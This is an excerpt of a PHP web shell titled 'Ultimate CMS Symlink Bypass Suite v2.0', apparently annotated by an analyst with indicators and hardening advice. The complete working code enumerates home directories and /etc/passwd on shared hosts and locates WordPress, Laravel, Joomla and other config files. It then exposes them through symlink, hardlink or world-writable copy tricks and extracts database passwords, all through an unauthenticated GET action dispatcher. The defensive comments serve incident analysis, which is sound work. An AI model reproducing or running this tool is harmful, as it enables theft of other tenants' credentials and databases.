'; file_put_contents("$FOLDER/web.config", $webconfig); }
// NOTE(review): the statement above is the tail of a definition that starts before this
// excerpt. Only this much is visible: it writes $webconfig (content not shown here) to
// "$FOLDER/web.config".
//
// ---------------------------------------------------------------------------------------
// Analyst summary (defensive reading of this sample)
//
// This excerpt is the server-side half of a PHP web shell whose page title is
// "Ultimate CMS Symlink Bypass Suite v2.0". On a shared host it:
//   1. enumerates candidate home / web-root directories (scanAllHomes),
//   2. looks inside each account for well-known CMS configuration files (scanCMSinHome),
//   3. creates a symlink, hardlink or copy of a chosen file inside $FOLDER
//      (createSymlinkBypass), and
//   4. parses database credentials out of the linked file (extractDBinfo).
// The dispatcher at the bottom exposes these steps through the GET parameter "action".
//
// Indicators visible in this excerpt:
//   - query strings with action=scan|create|view|extract|list|delete|bulk_create, together
//     with the parameters target=, targets= or link=;
//   - files in the shell's working folder named "link_<32 hex chars>_<4 digits>" or
//     "bulk_<32 hex chars>.link", next to a "web.config" file;
//   - the function names createSymlinkBypass, scanAllHomes, scanCMSinHome and extractDBinfo,
//     and the response string "All 15+ bypass techniques failed";
//   - a PHP worker reading /etc/passwd and calling opendir() on /home, /home2 ... /home20.
//
// Hardening that removes the preconditions this code relies on:
//   - run each account's PHP under its own UID (per-user PHP-FPM pool / suEXEC) and keep
//     config files readable by the owner only, with home directories not world-traversable;
//   - restrict PHP with open_basedir, and consider listing symlink and link in
//     disable_functions where the applications do not need them;
//   - on Apache, prefer SymLinksIfOwnerMatch over FollowSymLinks for user content;
//   - on Linux, keep the fs.protected_hardlinks sysctl enabled.
// NOTE(review): no authentication check is visible in this excerpt. One may exist earlier
// in the file (confirm). If there is none, any client that knows the URL can drive every
// action below, which matters when scoping an incident.
// ---------------------------------------------------------------------------------------

// ============== 15+ SYMLINK BYPASS TECHNIQUES ==============
// Tries to make $linkname refer to $target, using a list of alternative spellings of the
// target path and three primitives in order: symlink(), link(), copy().
//
// Parameters:
//   $target   - path of the file to expose (comes from the request in the handler below).
//   $linkname - path of the artefact to create.
// Returns: ['status' => bool, 'technique' => string]. On success 'technique' holds the path
//   string that was accepted, prefixed with "HARDLINK: " or "COPY: " when those primitives
//   were used. On failure it is ['status' => false, 'technique' => 'none'].
//
// Defender notes:
//   - All errors are suppressed with @, so nothing is written to the PHP error log.
//   - A "COPY:" result means the PHP process could read the target directly. In that case
//     the accounts were not isolated by file permissions at all.
//   - After a successful copy the artefact is chmod'ed to 0777, which leaves a
//     world-accessible copy of the config file in a web-served folder. Treat any such file
//     as exposed and prioritise it during clean-up.
function createSymlinkBypass($target, $linkname) {
    // Normalise both paths to forward slashes
    $target = str_replace('\\', '/', $target);
    $linkname = str_replace('\\', '/', $linkname);

    // Remove an existing file or link of the same name
    if(is_link($linkname) || file_exists($linkname)) {
        @unlink($linkname);
    }

    // Candidate strings passed as the link/copy source, tried in this order.
    $techniques = [
        // Technique 1: the path as given
        $target,
        // Technique 2: extra leading slashes
        "//$target",
        "///$target",
        // Technique 3: "." / ".." path segments
        "/./$target",
        "/../$target",
        "./$target",
        "../$target",
        // Technique 4: realpath(), falling back to the raw path when it returns false
        realpath($target) ?: $target,
        // Technique 5: URL-encoded path
        urlencode($target),
        // Technique 6: mixed slashes (Windows/Linux)
        str_replace('/', '\\', $target),
        str_replace('/', '//', $target),
        // Technique 7: trailing NUL byte (old PHP)
        $target . chr(0),
        // Technique 8: leading / trailing space
        $target . " ",
        " " . $target,
        // Technique 9: DOCUMENT_ROOT environment variable prepended
        getenv('DOCUMENT_ROOT') . $target,
        // Technique 10: if the target is itself a symlink, use what it points to
        (is_link($target) ? readlink($target) : $target),
        // Technique 11: /proc/self/cwd prefix (Linux only)
        (strpos(PHP_OS, 'Linux') !== false ? "/proc/self/cwd$target" : $target),
        // Technique 12: ftp:// wrapper prefix
        "ftp://" . $target,
        // Technique 13: phar:// wrapper prefix
        "phar://" . $target,
        // Technique 14: zip:// wrapper prefix
        "zip://" . $target,
        // Technique 15: glob:// wrapper prefix
        "glob://$target",
    ];

    // Try every candidate; the first primitive that returns true ends the function.
    foreach($techniques as $tech) {
        @clearstatcache();

        // Try a symbolic link
        if(@symlink($tech, $linkname)) {
            // NOTE(review): chmod() on a symlink path presumably acts on the link's target
            // rather than the link itself - confirm on the affected platform.
            @chmod($linkname, 0777);
            return ['status' => true, 'technique' => $tech];
        }

        // Try a hard link (alternative)
        if(@link($tech, $linkname)) {
            @chmod($linkname, 0777);
            return ['status' => true, 'technique' => "HARDLINK: $tech"];
        }

        // Try copy + bind (last resort); only copy() is actually called here
        if(@copy($tech, $linkname)) {
            @chmod($linkname, 0777);
            return ['status' => true, 'technique' => "COPY: $tech"];
        }
    }

    return ['status' => false, 'technique' => 'none'];
}

// ============== ADVANCED CMS SCANNER ==============
// Builds the list of directories that the scanner will walk.
//
// Returns: array of directory paths (array_unique keeps the original keys, so the result
//   is not necessarily a 0..n-1 list).
//
// Defender notes: a web-server or PHP worker process that stats /home, /home2 ... /home20
// and the other roots below, and then reads /etc/passwd, is a useful audit signal. An
// open_basedir setting scoped to the account's own tree makes these probes fail.
function scanAllHomes() {
    $homes = [];
    // Hard-coded roots that are probed with is_dir()
    $possible_paths = [
        '/home', '/home2', '/home3', '/home4', '/home5', '/home6', '/home7', '/home8', '/home9', '/home10',
        '/home11', '/home12', '/home13', '/home14', '/home15', '/home16', '/home17', '/home18', '/home19', '/home20',
        '/var/www', '/var/www/html', '/var/www/vhosts', '/www', '/public_html', '/domains', '/data/www', '/usr/local/www', '/srv/www'
    ];

    foreach($possible_paths as $path) {
        if(@is_dir($path)) {
            $homes[] = $path;
        }
    }

    // Read /etc/passwd and keep each full regex match ($matches[0]) that is_dir() accepts
    if(@file_exists('/etc/passwd')) {
        $passwd = @file_get_contents('/etc/passwd');
        if(preg_match_all('/home\/([^:\/]+)/', $passwd, $matches)) {
            foreach($matches[0] as $home) {
                if(@is_dir($home)) $homes[] = $home;
            }
        }
    }

    return array_unique($homes);
}

// Walks one directory returned by scanAllHomes() and reports which known configuration
// files exist under each entry's candidate web roots.
//
// Parameters:
//   $home - directory whose immediate sub-directories are treated as accounts.
// Returns: list of arrays with keys user, type, config, path, icon, priority, filesize,
//   sorted ascending by 'priority' (so priority 1 entries come first). The list is empty
//   when $home cannot be opened.
//
// Defender notes: the file names in $cms_configs are an inventory of what this tool goes
// after. They are the files whose permissions and ownership are worth auditing on a
// multi-tenant host. The scan only needs file_exists() to succeed, so directories that
// other accounts can traverse already reveal which CMS each account runs, even when the
// file contents are protected.
function scanCMSinHome($home) {
    $cms_list = [];
    if(!$handle = @opendir($home)) return $cms_list;

    while(false !== ($item = readdir($handle))) {
        if($item == '.' || $item == '..') continue;
        $user_path = "$home/$item";
        if(!@is_dir($user_path)) continue;

        // Candidate web roots inside the account directory (the directory itself is last)
        $web_paths = [
            "$user_path/public_html", "$user_path/www", "$user_path/web", "$user_path/htdocs", "$user_path/httpdocs",
            "$user_path/html", "$user_path/site", "$user_path/website", "$user_path/domains", $user_path
        ];

        foreach($web_paths as $web_path) {
            if(!@is_dir($web_path)) continue;

            // Configuration files checked for, by CMS / framework
            $cms_configs = [
                // WordPress
                ['file' => 'wp-config.php', 'type' => 'WordPress', 'icon' => '⚙️', 'priority' => 1],
                ['file' => 'wp-config-sample.php', 'type' => 'WordPress (Sample)', 'icon' => '⚙️', 'priority' => 2],
                // Laravel
                ['file' => '.env', 'type' => 'Laravel', 'icon' => '🎯', 'priority' => 1],
                ['file' => 'config/database.php', 'type' => 'Laravel Config', 'icon' => '🎯', 'priority' => 2],
                // CodeIgniter
                ['file' => 'application/config/database.php', 'type' => 'CodeIgniter', 'icon' => '🔥', 'priority' => 1],
                ['file' => 'system/config/database.php', 'type' => 'CodeIgniter', 'icon' => '🔥', 'priority' => 2],
                // Joomla
                ['file' => 'configuration.php', 'type' => 'Joomla', 'icon' => '🌐', 'priority' => 1],
                // Drupal
                ['file' => 'sites/default/settings.php', 'type' => 'Drupal', 'icon' => '🐘', 'priority' => 1],
                ['file' => 'settings.php', 'type' => 'Drupal', 'icon' => '🐘', 'priority' => 2],
                // Magento
                ['file' => 'app/etc/env.php', 'type' => 'Magento', 'icon' => '🛒', 'priority' => 1],
                ['file' => 'app/etc/local.xml', 'type' => 'Magento 1', 'icon' => '🛒', 'priority' => 1],
                // PrestaShop
                ['file' => 'config/settings.inc.php', 'type' => 'PrestaShop', 'icon' => '🛍️', 'priority' => 1],
                // OpenCart
                ['file' => 'config.php', 'type' => 'OpenCart', 'icon' => '📦', 'priority' => 1],
                ['file' => 'admin/config.php', 'type' => 'OpenCart Admin', 'icon' => '📦', 'priority' => 2],
                // Symfony
                ['file' => '.env.local', 'type' => 'Symfony', 'icon' => '🎨', 'priority' => 1],
                ['file' => 'app/config/parameters.yml', 'type' => 'Symfony', 'icon' => '🎨', 'priority' => 2],
                // CakePHP
                ['file' => 'config/app.php', 'type' => 'CakePHP', 'icon' => '🍰', 'priority' => 1],
                ['file' => 'app/Config/database.php', 'type' => 'CakePHP', 'icon' => '🍰', 'priority' => 2],
                // Yii
                ['file' => 'protected/config/main.php', 'type' => 'Yii', 'icon' => '🟡', 'priority' => 1],
                ['file' => 'config/db.php', 'type' => 'Yii2', 'icon' => '🟡', 'priority' => 1],
                // Custom config files
                ['file' => 'config.php', 'type' => 'Generic Config', 'icon' => '📄', 'priority' => 3],
                ['file' => 'database.php', 'type' => 'Database Config', 'icon' => '🗄️', 'priority' => 3],
                ['file' => 'db.php', 'type' => 'Database Config', 'icon' => '🗄️', 'priority' => 3],
                ['file' => 'settings.php', 'type' => 'Settings', 'icon' => '⚙️', 'priority' => 3],
                ['file' => '.env.production', 'type' => 'Laravel Env', 'icon' => '🎯', 'priority' => 2],
                ['file' => '.env.staging', 'type' => 'Laravel Env', 'icon' => '🎯', 'priority' => 2],
            ];

            foreach($cms_configs as $cms) {
                $config_path = "$web_path/{$cms['file']}";
                // Existence check only; the file is not opened here
                if(@file_exists($config_path)) {
                    $cms_list[] = [
                        'user' => $item,
                        'type' => $cms['type'],
                        'config' => $config_path,
                        'path' => $web_path,
                        'icon' => $cms['icon'],
                        'priority' => $cms['priority'],
                        'filesize' => @filesize($config_path)
                    ];
                }
            }
        }
    }
    closedir($handle);

    // Sort ascending by the numeric 'priority' field (1 before 2 before 3)
    usort($cms_list, function($a, $b) { return $a['priority'] - $b['priority']; });

    return $cms_list;
}

// ============== ADVANCED DB EXTRACTOR ==============
// Reads a file and pulls database connection settings out of it with regular expressions.
//
// Parameters:
//   $filepath - file to read (in the handler below, the resolved target of a link).
// Returns: ['error' => string] when the file is missing or unreadable/empty. Otherwise an
//   array with keys type, db, user, pass, host, port, charset, prefix. Defaults are
//   type 'Unknown', host 'localhost', port '3306', and empty strings for the rest.
//
// The first matching family decides 'type'. The order is WordPress, Laravel, CodeIgniter 3,
// Joomla, Drupal, Magento 2, then a generic fallback that leaves 'type' as 'Unknown'.
//
// Defender notes:
//   - These fields are exactly what leaks when a config file becomes readable across
//     accounts. After an incident, rotate the database password of every account whose
//     config file was linked or copied. Other secrets stored in the same file should be
//     considered exposed as well, because the 'view' action returns the whole file.
//   - Every value is passed through htmlspecialchars() before it is returned, so values
//     seen in captured responses may contain HTML entities and will not always match the
//     stored secret byte for byte.
function extractDBinfo($filepath) {
    if(!@file_exists($filepath)) return ['error' => 'File not found'];

    $content = @file_get_contents($filepath);
    // Also true for an empty file or the string "0", not only for a read failure
    if(!$content) return ['error' => 'Cannot read file'];

    $info = [
        'type' => 'Unknown', 'db' => '', 'user' => '', 'pass' => '', 'host' => 'localhost', 'port' => '3306', 'charset' => '', 'prefix' => ''
    ];

    // WordPress patterns: define('DB_*', '...') constants and $table_prefix
    if(preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m)) {
        $info['type'] = 'WordPress';
        $info['db'] = $m[1];
        preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]);
        preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]);
        preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]);
        preg_match("/define\s*\(\s*['\"]DB_CHARSET['\"]\s*,\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['charset'] = $m[1]);
        preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['prefix'] = $m[1]);
    }
    // Laravel patterns: KEY=value lines as found in .env files
    elseif(preg_match("/DB_DATABASE=([^\s\n]+)/i", $content, $m)) {
        $info['type'] = 'Laravel';
        $info['db'] = trim($m[1], "'\"");
        preg_match("/DB_USERNAME=([^\s\n]+)/i", $content, $m) && ($info['user'] = trim($m[1], "'\""));
        preg_match("/DB_PASSWORD=([^\s\n]+)/i", $content, $m) && ($info['pass'] = trim($m[1], "'\""));
        preg_match("/DB_HOST=([^\s\n]+)/i", $content, $m) && ($info['host'] = trim($m[1], "'\""));
        preg_match("/DB_PORT=([^\s\n]+)/i", $content, $m) && ($info['port'] = trim($m[1], "'\""));
    }
    // CodeIgniter 3 patterns: $db['default'][...] assignments
    elseif(preg_match("/\\\$db\['default'\]\['database'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) {
        $info['type'] = 'CodeIgniter 3';
        $info['db'] = $m[1];
        preg_match("/\\\$db\['default'\]\['username'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]);
        preg_match("/\\\$db\['default'\]\['password'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]);
        preg_match("/\\\$db\['default'\]\['hostname'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]);
    }
    // Joomla patterns: public $db / $user / $password / $host properties
    elseif(preg_match("/public\s+\\\$db\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) {
        $info['type'] = 'Joomla';
        $info['db'] = $m[1];
        preg_match("/public\s+\\\$user\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]);
        preg_match("/public\s+\\\$password\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]);
        preg_match("/public\s+\\\$host\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]);
    }
    // Drupal patterns: $databases['default']['default'][...] assignments
    elseif(preg_match("/\\\$databases\['default'\]\['default'\]\['database'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m)) {
        $info['type'] = 'Drupal';
        $info['db'] = $m[1];
        preg_match("/\\\$databases\['default'\]\['default'\]\['username'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]);
        preg_match("/\\\$databases\['default'\]\['default'\]\['password'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]);
        preg_match("/\\\$databases\['default'\]\['default'\]\['host'\]\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]);
    }
    // Magento 2 patterns: 'key' => 'value' array entries
    elseif(preg_match("/'dbname'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m)) {
        $info['type'] = 'Magento 2';
        $info['db'] = $m[1];
        preg_match("/'username'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['user'] = $m[1]);
        preg_match("/'password'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['pass'] = $m[1]);
        preg_match("/'host'\s*=>\s*['\"]([^'\"]+)['\"]/i", $content, $m) && ($info['host'] = $m[1]);
    }
    // Generic patterns (fallback): common key names followed by ':' or '=' and a quoted value
    else {
        if(preg_match("/(?:database|dbname|db_name)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['db'] = $m[1];
        if(preg_match("/(?:username|db_user|dbuser)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['user'] = $m[1];
        if(preg_match("/(?:password|pass|db_pass|dbpass|pwd)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['pass'] = $m[1];
        if(preg_match("/(?:host|db_host|dbhost)\s*[:=]\s*['\"]([^'\"]+)['\"]/i", $content, $m)) $info['host'] = $m[1];
    }

    // Clean up: strip quotes/whitespace/NUL, then HTML-escape every field
    foreach($info as $key => $value) {
        $info[$key] = htmlspecialchars(trim($value, "'\" \t\n\r\0\x0B"));
    }

    return $info;
}

// ============== AJAX HANDLER ==============
// Request dispatcher. It runs whenever the GET parameter "action" is present, always sets
// a JSON content type, and exits afterwards without rendering the page below.
//
// Actions and their parameters (all GET, so they normally appear in access logs):
//   scan                    - enumerate config files across all discovered homes
//   create      target=     - create one link/copy named link_<md5>_<4 digits>
//   view        link=       - echo the raw content of the linked file
//   extract     link=       - return parsed credentials as JSON
//   list                    - list every entry in $FOLDER with target, size, ctime
//   delete      link=       - unlink an entry
//   bulk_create targets=    - JSON array of targets; artefacts named bulk_<md5>.link
//
// Defender notes:
//   - 'view' sends file contents under the "application/json" content type set below.
//     Responses labelled JSON that carry PHP source or .env text are a strong signal in
//     proxy or WAF logs.
//   - bulk artefact names are md5() of the requested target string with no salt, so hashing
//     candidate config paths maps a leftover bulk_*.link file back to the file it was
//     created for, even when the artefact is a copy rather than a symlink.
//   - The 'link' and 'target' values are used in file paths as received, with no
//     validation visible here. A planted copy of this script therefore also exposes the
//     hosting account itself to whoever can reach it.
// $FOLDER is defined before this excerpt.
if(isset($_GET['action'])) {
    header('Content-Type: application/json');

    switch($_GET['action']) {
        case 'scan':
            $homes = scanAllHomes();
            $all_cms = [];
            foreach($homes as $home) {
                $cms_in_home = scanCMSinHome($home);
                $all_cms = array_merge($all_cms, $cms_in_home);
            }
            // Remove duplicates: keep the first entry seen for each config path
            $unique = [];
            foreach($all_cms as $cms) {
                $key = $cms['config'];
                if(!isset($unique[$key])) $unique[$key] = $cms;
            }
            echo json_encode(array_values($unique));
            break;

        case 'create':
            $target = $_GET['target'] ?? '';
            if($target) {
                // Artefact name: link_<md5(target . microtime())>_<random 1000-9999>
                $linkname = $FOLDER . "/link_" . md5($target . microtime()) . "_" . rand(1000,9999);
                $result = createSymlinkBypass($target, $linkname);
                if($result['status']) {
                    echo json_encode([
                        'status' => 'success',
                        'link' => basename($linkname),
                        'technique' => $result['technique'],
                        'fullpath' => $linkname
                    ]);
                } else {
                    echo json_encode([
                        'status' => 'error',
                        'message' => 'All 15+ bypass techniques failed',
                        'target' => $target
                    ]);
                }
            }
            break;

        case 'view':
            $link = $_GET['link'] ?? '';
            if($link && file_exists("$FOLDER/$link")) {
                // For a symlink the stored target is read; otherwise the raw parameter is used
                $target = is_link("$FOLDER/$link") ? @readlink("$FOLDER/$link") : $link;
                if(@file_exists($target) || @is_link($target)) {
                    $content = @file_get_contents($target);
                    if($content !== false) {
                        // Raw file content is written to the response unmodified
                        echo $content;
                    } else {
                        echo "Unable to read file content (maybe protected)";
                    }
                } else {
                    echo "Target file not accessible: $target";
                }
            } else {
                echo "Invalid symlink";
            }
            break;

        case 'extract':
            $link = $_GET['link'] ?? '';
            if($link && file_exists("$FOLDER/$link")) {
                $target = is_link("$FOLDER/$link") ? @readlink("$FOLDER/$link") : $link;
                $info = extractDBinfo($target);
                echo json_encode($info);
            } else {
                echo json_encode(['error' => 'Invalid link']);
            }
            break;

        case 'list':
            // Directory listing of $FOLDER; on an affected host the same listing is a
            // ready-made inventory of which files were exposed.
            $links = [];
            if(is_dir($FOLDER)) {
                foreach(scandir($FOLDER) as $item) {
                    if($item == '.' || $item == '..') continue;
                    $path = "$FOLDER/$item";
                    $links[] = [
                        'name' => $item,
                        'target' => is_link($path) ? @readlink($path) : $path,
                        'is_link' => is_link($path),
                        'size' => @filesize($path),
                        'created' => @date('Y-m-d H:i:s', filectime($path))
                    ];
                }
            }
            echo json_encode($links);
            break;

        case 'delete':
            $link = $_GET['link'] ?? '';
            if($link) {
                $path = "$FOLDER/$link";
                if(is_link($path) || file_exists($path)) {
                    // Removes the artefact; earlier access-log entries remain the evidence
                    @unlink($path);
                    echo json_encode(['status' => 'deleted', 'link' => $link]);
                } else {
                    echo json_encode(['status' => 'not found']);
                }
            }
            break;

        case 'bulk_create':
            $targets = json_decode($_GET['targets'] ?? '[]', true);
            $results = [];
            foreach($targets as $target) {
                // Deterministic artefact name: bulk_<md5(target)>.link
                $linkname = $FOLDER . "/bulk_" . md5($target) . ".link";
                $result = createSymlinkBypass($target, $linkname);
                $results[] = [
                    'target' => $target,
                    'status' => $result['status'],
                    'link' => $result['status'] ? basename($linkname) : null
                ];
            }
            echo json_encode($results);
            break;
    }
    exit;
}
?> 🚀 Ultimate CMS Symlink Bypass Suite v2.0

Ultimate Symlink Bypass Suite

Advanced CMS Scanner + 15+ Symlink Bypass Techniques

WordPress Laravel CodeIgniter Joomla Drupal Magento
PHP:
Symlink:
0
CMS Ditemukan
0
Symlink Aktif
0
DB Creds Ditemukan

Detected CMS Configurations

Click "FULL SCAN" to start scanning...

Active Symlinks

Database Credentials Extractor

Click "Extract DB" on any symlink

Bulk Actions

Advanced Symlink Bypass Suite | 15+ Techniques | Auto DB Extractor